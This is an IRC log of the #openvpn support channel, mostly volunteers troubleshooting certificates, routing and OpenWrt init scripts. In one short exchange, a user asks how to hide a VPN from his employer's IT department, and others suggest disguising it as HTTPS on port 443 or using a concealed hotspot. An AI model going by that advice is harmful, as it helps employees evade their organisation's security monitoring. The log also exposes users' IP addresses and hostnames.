!wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 09:58 < markovh> !goal 09:58 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 10:00 -!- xbanux [~xbanux@triband-mum-59.182.142.68.mtnl.net.in] has joined #openvpn 10:02 -!- Juzzy [Xinu@107-194-81-122.lightspeed.nsvltn.sbcglobal.net] has left #openvpn [] 10:13 < njbair> 00000.0 10:16 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 10:19 -!- markovh [markov@unaffiliated/markovh] has left #openvpn [] 10:21 -!- Netsplit *.net <-> *.split quits: piele_, TypoNe 10:28 -!- raidz_away is now known as raidz 10:43 -!- dropje [~yge@ip4da6274e.direct-adsl.nl] has joined #openvpn 10:44 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has quit [Ping timeout: 264 seconds] 10:51 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 256 seconds] 10:52 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 10:54 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 272 seconds] 10:55 -!- APTX_ [APTX@unaffiliated/aptx] has joined #openvpn 10:55 -!- APTX [APTX@unaffiliated/aptx] has quit [Ping timeout: 245 seconds] 11:06 -!- Olipro [~Olipro@d.e.r.p.6.a.1.0.d.d.0.7.2.0.1.0.a.2.ip6.arpa] has joined #openvpn 11:06 -!- piele_ [~Unknown@bakzeil.creativeserver.net] has joined #openvpn 11:06 -!- Olipro [~Olipro@d.e.r.p.6.a.1.0.d.d.0.7.2.0.1.0.a.2.ip6.arpa] has quit [Max SendQ exceeded] 11:08 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has joined #openvpn 11:16 -!- kubbing [~kubbing@c-006.certicon.cz] has quit [Ping timeout: 245 seconds] 11:18 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Ping timeout: 264 seconds] 11:27 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 11:42 -!- Netsplit *.net <-> *.split quits: jzaw, pekster, `nand` 11:42 -!- Netsplit over, joins: pekster 11:43 -!- Netsplit over, joins: jzaw 11:49 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn 11:53 -!- `nand` [~nand@2a01:4f8:d13:5245::2] has joined #openvpn 12:00 -!- Poster [~poster@cpe-184-57-119-105.columbus.res.rr.com] has quit [Remote host closed the connection] 12:01 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 12:01 -!- Poster [~poster@cpe-184-57-119-105.columbus.res.rr.com] has joined #openvpn 12:03 -!- RudyValencia [~self@unaffiliated/rudyvalencia] has joined #openvpn 12:04 < robert_> Hi, RudyValencia and I are trying to get a VPN going where clients can't access other clients' VPN addresses, but servers can access everybody's VPN addresses. 12:04 -!- mndo [~mndo@bl16-93-232.dsl.telepac.pt] has joined #openvpn 12:04 < RudyValencia> and clients should be able to access servers, of course 12:04 < Poster> you need the client-to-client defined in your server configuration 12:05 < pekster> No, you explicitly need *not* to have that defined if you want to do per-client access control like that 12:05 < pekster> !c2c 12:05 <@vpnHelper> "c2c" is "client-to-client" is with this option packets from 1 client to another are routed inside the server process. without it packets leave the server process, hit the kernel (firewall, routing table) and if allowed by firewall and routed back to server process, they go to the client. you use this option when you do not want to use selective firewall rules on what clients can access things 12:05 <@vpnHelper> behind other clients 12:05 < RudyValencia> so we're stumbling on the whole "The server will only accept clients whose certificates were signed by the master CA certificate" thing 12:06 < Poster> oh, sorry I misread 12:06 < RudyValencia> does that mean client certificates must come from the same CA that issues server certificates? 12:06 < pekster> Yes 12:06 < pekster> That's how PKI works 12:07 < robert_> we were thinking about using separate intermediate CAs for clients and servers 12:07 < RudyValencia> Does that requirement extend to the same subordinate CA (e.g., can we have an identities CA and a network CA rooted to the same root CA?) 12:07 < pekster> Sure, you can use a subCA. IIRC you need the chain provided to the remote end so it can fully verify the trust chain 12:08 < pekster> Unless it's a benefit for your admin process, it's generally more trouble than it's worth to run a chained CA setup like that for OpenVPN. However, perhaps you have benefits in your workflow for such a case 12:09 < Poster> only benefit I could see would be allowing a helpdesk/desktop type group to issue client certs without knowing the CA passphrase for server 12:10 < Poster> but inheritly clients would trust client certs and server certs 12:10 <@EugeneKay> It simplifies configuration a bit because you don't need to ensure that a server is signed as a client/server if you know beforehand that the CA signing it is only used for clients/servers. 12:10 < RudyValencia> we may be automating that process when we write our HR systems 12:10 <@EugeneKay> Eg, you don't need to do any checks on the certUsage 12:11 < Poster> I've not had to specify whether a cert is a client or server cert 12:11 < Poster> I use them in both directions 12:11 < pekster> !mitm 12:11 <@vpnHelper> "mitm" is (#1) http://openvpn.net/index.php/documentation/howto.html#mitm to know about stopping Man-in-the-Middle attacks by signing the server cert specially or (#2) use !servercert to generate the server cert manually or use the easy-rsa build-key-server script to build your server certificates or (#3) then use: remote-cert-tls server in the client config 12:11 < RudyValencia> We have a CA already 12:12 < pekster> Right. That info is mostly generic (besides the easy-rsa centric stuff.) If you don't use a separate CA chain for client/server certs and you don't have clients verify ku/eku of certs, authorized clients can possibly post as serveres as a MITM attacker to another client 12:12 < pekster> pose* 12:13 <@EugeneKay> Yup. But if you have access to takeover the server's IP address you prooooobably have the server.key anyway 12:13 <@EugeneKay> Different sort of check, but in real-world security.... 12:13 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 12:14 < pekster> ARP spoofing, DNS poisioning, asserting yourself as your target's default gateway, plenty of ways to become an attacker on the wire in the flow of data if you have the access 12:14 < RudyValencia> We can use two different config files with openssl to generate certs with different KU/EKU parameters 12:14 < RudyValencia> e.g., openssl-server.conf for server certs, openssl-client.conf for client certs 12:15 <@EugeneKay> I also set the ns-cert-type 12:15 < RudyValencia> yes 12:15 < pekster> Sure, but you don't even need that; easy-rsa 2.x has support for this out of the box (see the .cnf file it provides) and the prototype 3.x "next-gen" code I'm working on does it dynamically with an -extfile option 12:15 < Poster> I thought tls-remote was used to validate the remote side is who they say they are 12:15 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Remote host closed the connection] 12:15 < Poster> requiring a cert to match the name and being signed by the same CA 12:15 < pekster> No need for multiple config files if you set up your openssl.cnf to support mutliple extension stanzas 12:16 <@EugeneKay> XCA 4 Lyfe 12:16 < pekster> EugeneKay: nsCertType is more or less deprecated. TLS ku/eku is where it's at now. I'd love to see the "Netscape" extensions die a death much quicker than they will 12:16 <@EugeneKay> Meh 12:17 < pekster> Poster: That's one way, but it precludes the use of multiple server certs with unique DNs 12:18 < pekster> Or at least the CN field 12:19 < pekster> Hmm, I guess the manpage says you can use a "prefix" too. Sort of a weird feature 12:19 -!- TypoNe [~itsme@195.197.184.87] has joined #openvpn 12:21 -!- APTX_ [APTX@unaffiliated/aptx] has quit [Ping timeout: 245 seconds] 12:22 -!- APTX [APTX@unaffiliated/aptx] has joined #openvpn 12:24 -!- APTX [APTX@unaffiliated/aptx] has quit [Read error: Connection reset by peer] 12:28 -!- APTX [APTX@unaffiliated/aptx] has joined #openvpn 12:29 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 12:32 -!- epochwolf [~root@unaffiliated/epochwolf] has joined #openvpn 12:32 < epochwolf> EugeneKay: yo 12:32 < epochwolf> I'm trying to set up openvpn so I can access my home network from my work. I can have all the computer connect and ping the server but they can't see eachother and when I turn on client-to-client on the server, the clients can't ping anyone, including the server. 12:32 < epochwolf> https://gist.github.com/epochwolf/e77b5e77ad4eee8bfd9e 12:32 <@vpnHelper> Title: client.conf (at gist.github.com) 12:32 <@EugeneKay> !serverlan 12:32 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png 12:33 < epochwolf> EugeneKay: so I need push route, not route 12:33 <@EugeneKay> Yes. The server routing lan traffic via openvpn would be daft ;-) 12:34 < epochwolf> EugeneKay: the description for client-to-client implies that :P 12:34 <@EugeneKay> client-to-client is for vpn clients 12:34 < epochwolf> that's what I want. 12:34 < epochwolf> I want clients on the vpn to be able to talk to other clients on the vpn. 12:35 <@EugeneKay> Uh 12:35 <@EugeneKay> Is your home LAN behind a VPN client? 12:35 < epochwolf> EugeneKay: no… two computers on my home lan, one is at work. I want them all to talk to eachother. 12:35 <@EugeneKay> So which machine is your VPN server 12:35 < epochwolf> linode vps 12:36 <@EugeneKay> So, then the answer is "yes", the LAN is behind a vpn client 12:36 < epochwolf> all clients can ssh into it through the vpn right now. 12:36 <@EugeneKay> You want Client A to be able to speak to a LAN behind client B 12:36 < epochwolf> not the lan, just the client 12:36 < epochwolf> I want 10.133.7.4 to ping 10.133.7.5 12:36 <@EugeneKay> Well then no routing beyond the basics needed for openvpn should nbe needed 12:37 <@EugeneKay> Just allow the relevant stuff in the firewalls 12:37 < epochwolf> iptables is clear and ip_forward is on 12:37 <@EugeneKay> clear != open ;-) 12:37 < epochwolf> hmm… I'll add my iptables conf 12:37 < pekster> And remember if you test is a ping, that all *3* involved systems need to accept it 12:37 <@EugeneKay> Look at the nat table 12:37 < epochwolf> nat table? 12:38 <@EugeneKay> iptables -t nat 12:38 <@EugeneKay> You're not doing any, but it might have some silly rule in it 12:38 < pekster> 'iptables-save' is the surest way to view your complete netfilter ruleset, including all tables you have loaded 12:38 < epochwolf> a dozen entries of MASQUERADE all -- 10.133.7.0/24 anywhere 12:38 <@EugeneKay> !paste 12:38 <@vpnHelper> "paste" is "pastebin" is (#1) please paste anything with more than 5 lines into pastebin or a similar website or (#2) https://gist.github.com is a recommended place to use 12:39 < epochwolf> pekster: I've got a save 12:39 <@EugeneKay> If both clients can ping the server's VPN address then you're most of the way there 12:39 <@EugeneKay> Also see if the server can pign the client's VPN addy 12:39 <@EugeneKay> It /could/ be the client firewalls too 12:40 < epochwolf> https://gist.github.com/epochwolf/e77b5e77ad4eee8bfd9e#file-iptables-conf 12:40 <@vpnHelper> Title: client.conf (at gist.github.com) 12:40 < epochwolf> EugeneKay: they are off right now. :) I can ping locally 12:40 <@EugeneKay> Again; clear != open, and locally != remotely 12:40 < epochwolf> EugeneKay: both systems are OS X and have their firewall off in the preferences. 12:41 <@EugeneKay> But can the server ping them? 12:41 < epochwolf> let me check 12:41 < epochwolf> yes 12:41 <@EugeneKay> Goodie 12:42 < robert_> so just to be clear, can we have two separate CA's for client and services access? 12:42 < vect0rx> bbl 12:42 -!- vect0rx [vectorx@havok.org] has left #openvpn [] 12:42 < epochwolf> I just loaded the firewall rules, I can ping between client and the server but not between clients 12:42 <@EugeneKay> robert_ - yes; the certificate in --cert does NOT need to be signed by the one listed in --ca. 12:42 < pekster> robert_: Yes. You can even make them completely separate root CAs if you'd like instead of subCAs under a common root since validation is handled remotely by the peer validating the presented cert 12:43 <@EugeneKay> epochwolf - what happens with client-to-client on? 12:43 < epochwolf> EugeneKay: no one can ping 12:43 <@EugeneKay> Fun 12:43 <@EugeneKay> Oh, add in 'topology subnet' 12:43 < epochwolf> EugeneKay: adding that push route also killed pings 12:44 <@EugeneKay> It'll make things a LOT simpler 12:44 <@EugeneKay> I hate that it isn't the default 12:45 < pekster> Oh, that reminds me to look at why --route-gateway isn't the default when using --server with --topology subnet 12:45 < epochwolf> EugeneKay: to server or client? 12:45 <@EugeneKay> Server 12:45 < epochwolf> EugeneKay: okay, I've reverted the configs back to the gist version. I will add "topology subnet". 12:46 <@EugeneKay> Client gets it automagically as part of --client / --pull 12:46 < epochwolf> do I need client-to-client or a route? 12:46 <@EugeneKay> No route should be needed 12:46 <@EugeneKay> The --server line handles all of the route statements 12:46 < epochwolf> do I need client-to-client? 12:47 <@EugeneKay> You shouldn't with that iptables config, but feel free to toss it in 12:47 < epochwolf> EugeneKay: that didn't work. :( 12:48 <@EugeneKay> Logs? 12:48 < robert_> pekster/EugeneKay and this is on the same openvpn setup? 12:48 < epochwolf> EugeneKay: what logs? 12:48 <@EugeneKay> !logs 12:48 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 12:48 <@EugeneKay> Those logs ^ 12:49 < pekster> robert_: If by "same setup" you mean 2 peers establishing an openvpn tunnel, yes. 12:49 <@EugeneKay> robert_ - each peer only verifies the other party's --cert against the local --ca. They do NOT verify their own --cert against the same --ca. 12:49 < epochwolf> EugeneKay: https://gist.github.com/epochwolf/97cc25d8df6b4526ce0d 12:49 <@vpnHelper> Title: client.log (at gist.github.com) 12:49 <@EugeneKay> 2013-03-19 10:48:15 ERROR: OS X route add command failed: external program exited with error status: 68 12:49 <@EugeneKay> That's telling 12:49 < robert_> pekster: "same setup" meaning same instance of openvpn 12:50 <@EugeneKay> Something isn't write in your server.conf 12:50 <@EugeneKay> Paste a freshie? 12:50 < pekster> netmask isn't a netmask; it's an IP 12:50 < epochwolf> EugeneKay: give me a few minutes. I've got to shuffle the file around again. I can't directly download from here. 12:52 < pekster> robert_: Same "instance"? huh? PKI/X509 is used to validate opposing ends (each unique instances themselves.) Each side has only a single --ca certificate (used to validate a remote peer's presented cert) and a --cert certificate (presented to the other peer for said validation on the remote end) 12:52 < robert_> nevermind 12:53 < epochwolf> EugeneKay: https://gist.github.com/epochwolf/015b19e2da5a71119293 12:53 <@vpnHelper> Title: clients_teapot (at gist.github.com) 12:54 <@EugeneKay> Yah, there's your problem 12:54 <@EugeneKay> Set a netmask 12:54 <@EugeneKay> In your ccd file 12:55 -!- xbanux [~xbanux@triband-mum-59.182.142.68.mtnl.net.in] has quit [Read error: Connection reset by peer] 12:55 -!- xbanux [~xbanux@triband-mum-59.182.131.184.mtnl.net.in] has joined #openvpn 12:57 < epochwolf> netmask? 12:57 <@EugeneKay> Set the last arg to 255.255.255.0 12:57 < epochwolf> oh, I'm a fucking idiot :D 12:58 <@EugeneKay> I'm not debating that 13:02 <@EugeneKay> Works now? 13:03 < epochwolf> EugeneKay: I disabled ccds and client-to-client works. 13:04 < epochwolf> Now I need to turn them back on and figure out why it's not working 13:04 <@EugeneKay> Because you derped the ccd :-p 13:04 < epochwolf> no shit :D 13:04 -!- ceda [~fredrik@c83-248-146-227.bredband.comhem.se] has quit [Read error: Operation timed out] 13:04 < epochwolf> This breaks it "ifconfig-push 10.133.7.6 10.133.7.0 255.255.255.0 " 13:05 <@EugeneKay> Remove the middle arg 13:05 < epochwolf> oh 13:06 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 13:08 < epochwolf> EugeneKay: thank you so much, it's working 13:08 -!- novaflash is now known as novaflash_away 13:09 -!- novaflash_away is now known as novaflash 13:09 <@EugeneKay> Enjoy 13:09 < epochwolf> I will 13:09 < epochwolf> next question, how do I hide a vpn connection so my it department doesn't know that I'm using a vpn to access my work machine? :P 13:09 <@EugeneKay> !statickey 13:09 <@vpnHelper> "statickey" is (#1) you can use static keys by using --secret or (#2) static keys only work for ptp links, not client/server. They also do not provide forward encryption. A forward-secure encryption scheme (such as openvpn uses with certs) protects secret keys from exposure by evolving the keys with time. or (#3) see !forwardsecurity for more info 13:10 <@EugeneKay> tl;dr you can't. 13:10 < epochwolf> EugeneKay: lol, nice response 13:10 <@EugeneKay> They'll know you're running /something/, just not necessarily what. 13:10 <@EugeneKay> A proper static-key setup looks like essentially random data, but it's still data 13:10 < epochwolf> haha, I know. I was kidding. If I wanted to do that I would have a cronjob that checks a remote url for a specific phrase and only start the vpn if that phrase exists. 13:10 <@EugeneKay> If you want to hide your traffic buy a cell hotspot 13:11 < epochwolf> Actually, that's not a bad idea. I could easily hide an ipad in the case. 13:12 < epochwolf> Not going to do that. :) 13:12 < epochwolf> I've thought about how to do it but getting arrested for hacking isn't high on my list of life goals. 13:13 < kisom> How's that hacking? 13:15 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 276 seconds] 13:16 -!- xbanux [~xbanux@triband-mum-59.182.131.184.mtnl.net.in] has quit [Ping timeout: 255 seconds] 13:16 -!- ade_b [~Ade@AMarseille-156-1-204-244.w92-150.abo.wanadoo.fr] has joined #openvpn 13:16 -!- ade_b [~Ade@AMarseille-156-1-204-244.w92-150.abo.wanadoo.fr] has quit [Changing host] 13:16 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 13:28 -!- mndo [~mndo@bl16-93-232.dsl.telepac.pt] has quit [Remote host closed the connection] 13:42 -!- master_of_master [~master_of@p4FF24360.dip.t-dialin.net] has joined #openvpn 13:44 -!- master_o1_master [~master_of@p4FF24F5D.dip.t-dialin.net] has quit [Ping timeout: 252 seconds] 13:50 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 248 seconds] 13:52 < Poster> your best bet is probably to run the openvpn daemon on 443/tcp 13:52 < Poster> of everything possibly legit, https traffic is your best bet 13:53 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 13:54 < rob0> Personally, I would not work very hard to subvert the will of corporate IT. If they don't want me doing something, I wouldn't do it, even if in my opinion it was for the benefit of the company. 14:05 -!- xbanux [~xbanux@triband-mum-59.182.131.184.mtnl.net.in] has joined #openvpn 14:10 -!- dvl [~dan@nyi.unixathome.org] has joined #openvpn 14:10 -!- dvl [~dan@nyi.unixathome.org] has quit [Changing host] 14:10 -!- dvl [~dan@pdpc/supporter/active/dvl] has joined #openvpn 14:19 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 256 seconds] 14:23 -!- kubbing [~kubbing@89.177.146.18] has quit [Remote host closed the connection] 14:30 -!- dazo is now known as dazo_afk 14:30 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer] 14:31 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 14:49 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 245 seconds] 14:50 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 14:51 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Ping timeout: 276 seconds] 15:00 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Read error: Connection reset by peer] 15:03 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 15:06 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has quit [Ping timeout: 245 seconds] 15:06 -!- ceda [~fredrik@c83-248-146-227.bredband.comhem.se] has joined #openvpn 15:31 -!- GH0 [~asdfgjkl@cpe-173-095-129-006.nc.res.rr.com] has joined #openvpn 15:37 < jzaw> can one put an up /etc/openvpn/somescript.sh in client.conf? 15:38 < jzaw> doesnt seem to be exectuting in 2.3 on openwrt 15:39 < jzaw> script-security 2 15:39 < jzaw> up "/etc/openvpn/client-up.sh" 15:39 < pekster> You checked warnings about --script-security in your logs? And sometimes init systems will add their own --up and --down scripts, so perhasp try it from the command-line to verify it's working as expected 15:39 < jzaw> and client-up.sh is 744 15:40 < jzaw> it works if i execute manually from cli 15:40 < pekster> openvpn? 15:40 < jzaw> openvpn on openwrt 15:40 < pekster> as in, "openvpn --config /etc/openvpn/my.conf" ? 15:40 < jzaw> ah no ... i ran it after i ran openvpn 15:41 < pekster> I suggesting you run openvpn directly from a console to rule out the distro's init inserting its own upscript in place of yours. I don't recall offhand how openwrt does the openvpn init becuase I wrote my own 15:43 -!- nutron [~nutron@unaffiliated/nutron] has quit [Quit: I must go eat my cheese!] 15:44 < jzaw> trying now pekster 15:44 < jzaw> that works ... running manually as you said 15:44 < jzaw> interesting that i dont seem to get any ipv6 traffic ... say mtr 15:45 < jzaw> till ive done a mtr in ipv4 first 15:45 < jzaw> pekster, would it be appropriate for you to share your init script? 15:46 -!- TheWarden [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has joined #openvpn 15:47 < pekster> For openwrt? I need to get a cleaner copy as what I have now is really rough (a longer-term version is on my todo list, but first is getting hacked together what I want it to do before I worry about beautifying it and connecting it to UCI.) Hang on a minute and I'll see if what I have in source control is of any use 15:52 < pekster> jzaw: I'm not sure how useful it is, but here you go: http://pekster.sdf.org/code/files/openvpn.init.devel 15:53 < pekster> I haven't touched it in a while (been more interested in other projects recently) but IIRC it should work to start/stop. Obviously the status doesn't do much. To use it, drop it in /etc/init.d/whatever (openvpn, or openvpn-perinstance or something) and symlink openvpn.configname to it. It'll then start /etc/openvpn/configname.conf 15:55 -!- xbanux [~xbanux@triband-mum-59.182.131.184.mtnl.net.in] has quit [Ping timeout: 264 seconds] 15:57 < jzaw> thank pekster 15:58 -!- Orbi [~opera@anon-186-54.vpn.ipredator.se] has joined #openvpn 16:08 < jzaw> pekster, where in your init script you have EXTRA_COMMANDS="status" 16:08 < jzaw> the openwrt init script has 16:08 < jzaw> EXTRA_COMMANDS="up down" 16:09 < jzaw> is this what is getting in the way ? 16:09 < pekster> The stock No clue. My custom firmware rips out the stock initscript, so I don't really care to troubleshoot upstream's stupid design choices 16:09 < pekster> If it adds the --up option to some script, probably 16:10 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 260 seconds] 16:10 < pekster> It should be somewhat trivial to add an echo line in the initscript above the line that launches openvpn (usually with $SSD that is defined to start-stop-daemon, but again, without a copy in front of me I'm just guessing 16:11 < pekster> They source all the configuration from UCI, so it's almost as bad as NetworkManager in terms of transparancy. That's one of the many reasons I replaced it with a no-frills initscript that I could manage myself 16:11 < pekster> The only reason to run upstream's init is if you want it to integrate nicely into LuCI or WebIF 16:12 -!- troyt [~troyt@2001:1938:240:3000::3] has quit [Ping timeout: 252 seconds] 16:14 < jzaw> http://sprunge.us/PjaL 16:16 -!- rocco1 [~rocco@2001:4dd0:fd53:101:213:77ff:fef1:af0e] has joined #openvpn 16:16 -!- rocco1 [~rocco@2001:4dd0:fd53:101:213:77ff:fef1:af0e] has left #openvpn [] 16:16 < jzaw> pekster, i pretty much hate uci 16:16 -!- troyt [~troyt@2001:1938:240:3000::3] has joined #openvpn 16:17 < pekster> UCI has its purpose. Check out my iptables init project on my openwrt page for a sample of how to "properly," IMO, use it 16:17 < pekster> I make no attempt to integrate my code into the web frontends since I don't even have such a frontend in my firmware. I use it strictly as a console interface and tune it to suit me 16:18 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has quit [Quit: Leaving] 16:19 < pekster> At quick glance (all I'm willing to look at their config) 'start' starts the 'openvpn' labeled instance, while 'up' starts all instances of type 'openvpn'. Doesn't look like anything mucks with --up unless present in the UCI config 16:20 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has joined #openvpn 16:20 < pekster> Everything else is merely pulled from the UCI config with underscores converted to dashes, followed by any optional parameters 16:21 * jzaw nods 16:21 < jzaw> thanks for looking 16:28 -!- kls [~kls@198.211.125.123] has joined #openvpn 16:28 -!- kls [~kls@198.211.125.123] has left #openvpn [] 16:30 -!- JSharpe_ [~JSharpe@ip5-63-150-164.lon.ukinetcom.net] has joined #openvpn 16:31 -!- JSharpe [~JSharpe@web.sinexdigitalrecovery.com] has quit [Ping timeout: 264 seconds] 16:52 < jzaw> pekster, just for clarity ... i ln -s openvpn openvpn.client .... it finds and runs /etc/openvpn/client.conf 16:53 < pekster> Assuming you issued that command in /etc/init.d/, yes 16:53 < jzaw> but for it to run at boot time ill have to symlink openvpn.client to something like rc.d/S20openvpn.client 16:53 < pekster> Right 16:54 < jzaw> cool cool ... just making sure 16:54 < jzaw> :) 16:54 < pekster> S95 is more appropriate 16:54 < jzaw> ah so to make sure all interfaces are up and stable etc 16:55 < jzaw> youre right ... its S95 curently now 16:55 < jzaw> currently 16:55 < pekster> Hence why I listed it in my config 16:56 < pekster> A clean way to add/remove configs was on a back-burner item in that project log. The plan was to migrate to UCI to define the configs (but not the actual config itself) so the start/stop/instance stuff was just a filler until then 16:56 < pekster> (hence why it's not exactly polished.) If you use early development code, you keep all the bits when it doesn't do what you want ;) 16:57 < jzaw> :) 16:58 < jzaw> say you mention not having a gui on your openwrt 16:58 < pekster> Better question for #openwrt 16:58 < jzaw> i used it years ago originially on the wrt54gl ... 16:58 < jzaw> ah sure ... was just going to ask ... is it poss to have it like a bare linux box none of this uci stuff? 16:58 < jzaw> ie more trad 16:59 < pekster> UCI is a core part of how they do things. It replaces the "nvram" setup by allowing you to use traditional Unix config files backed by jffs2 storage. This is a vast improvement from the 8.x days 17:00 < jzaw> one last one ... is there any convention prohibiting a dot in the S95openvpn.conf symlink? 17:00 < pekster> UCI isn't even bad; in fact, it's great. It's only a poor tool when f.eg your entire openvpn config ends up in UCI instead of in a config file where it belongs. That's when the abstraction has gone too far 17:01 < jzaw> funnily enough i just wrote a normal conf ... didnt use their option blah nomenclature 17:01 < pekster> Have as many dots as you want, but the instance name used to form the config strips everything up to and including the final dot 17:01 < pekster> So /etc/rc.d/S95.open.v.p.n.thing1 would still launch thing1.conf 17:01 < jzaw> cool 17:02 -!- defsdoor [~andy@cpc30-sutt4-2-0-cust155.19-1.cable.virginmedia.com] has joined #openvpn 17:02 < jzaw> i presume one would have to have an init script for each vpn ? 17:02 < jzaw> theirs seems to find any file with .conf on it 17:02 < jzaw> i think 17:03 < pekster> Right. That was a temporary design intended to go away that has been left with the stagnation on that project 17:03 * jzaw nods i understand 17:03 < jzaw> well thats using my up.sh nicely now 17:03 < jzaw> thanks 17:05 < jzaw> has to be said for a £10, 5Watt device a tp-link wr740n does rather bloody well 17:05 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 17:06 -!- Orbi [~opera@anon-186-54.vpn.ipredator.se] has left #openvpn [] 17:24 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has joined #openvpn 17:24 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 17:26 -!- defsdoor [~andy@cpc30-sutt4-2-0-cust155.19-1.cable.virginmedia.com] has quit [Quit: Ex-Chat] 17:38 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 245 seconds] 17:43 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 17:55 -!- TheWarden [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has quit [Read error: Connection reset by peer] 18:02 -!- master_o1_master [~master_of@p4FF24CB8.dip.t-dialin.net] has joined #openvpn 18:06 -!- master_of_master [~master_of@p4FF24360.dip.t-dialin.net] has quit [Ping timeout: 252 seconds] 18:11 -!- novaflash is now known as novaflash_away 18:14 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 18:28 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 18:29 -!- M1L0 [~M1L0@200.106.37.56] has joined #openvpn 18:29 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 18:34 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 264 seconds] 18:34 < M1L0> buenas, alguien que hable español? 18:35 < rob0> Se habla openvpn. Google Translate helps with the rest. 18:36 < M1L0> XD 18:36 < M1L0> Gracias, es que tengo un probelma, no puedo ver mis clientes Openvpn desde el servidor.. 18:47 < M1L0> I have a problem, I can not see my remote clients from the server Openvpn 18:53 -!- CygniX [~CygniX@unaffiliated/twois10] has joined #openvpn 18:53 < rob0> Often that's because of client firewalls. "See" means what? ping? 18:54 < M1L0> no ping 18:54 < rob0> check firewalls 18:55 < M1L0> from server to client, or from client to client 18:55 < rob0> possible either or both, yes 18:57 < M1L0> you know any manual? 19:03 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 19:03 -!- JSharpe__ [~JSharpe@ip5-63-150-164.lon.ukinetcom.net] has joined #openvpn 19:04 -!- robert___ [~hellspawn@objectx/robert] has joined #openvpn 19:05 -!- robert_ [~hellspawn@objectx/robert] has quit [Read error: Connection reset by peer] 19:05 -!- matsh [divine@nanogene.org] has quit [Read error: Connection reset by peer] 19:05 -!- matsh [divine@nanogene.org] has joined #openvpn 19:05 -!- JSharpe_ [~JSharpe@ip5-63-150-164.lon.ukinetcom.net] has quit [Read error: Connection reset by peer] 19:17 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 258 seconds] 19:26 -!- brute11k [~brute@89.249.235.131] has quit [Quit: Leaving.] 19:27 < pekster> M1L0: The official "howto" guide is at the following URL: 19:27 < pekster> !howto 19:27 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 19:28 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 19:28 < rob0> um, if you mean a manual for your OS's firewall, that varies by OS. 19:29 < pekster> M1L0: First you want to get OpenVPN connected without errors. Check the client and server logs for any listed errors. Then you want to try a ping in in both directions to check connections between the client and 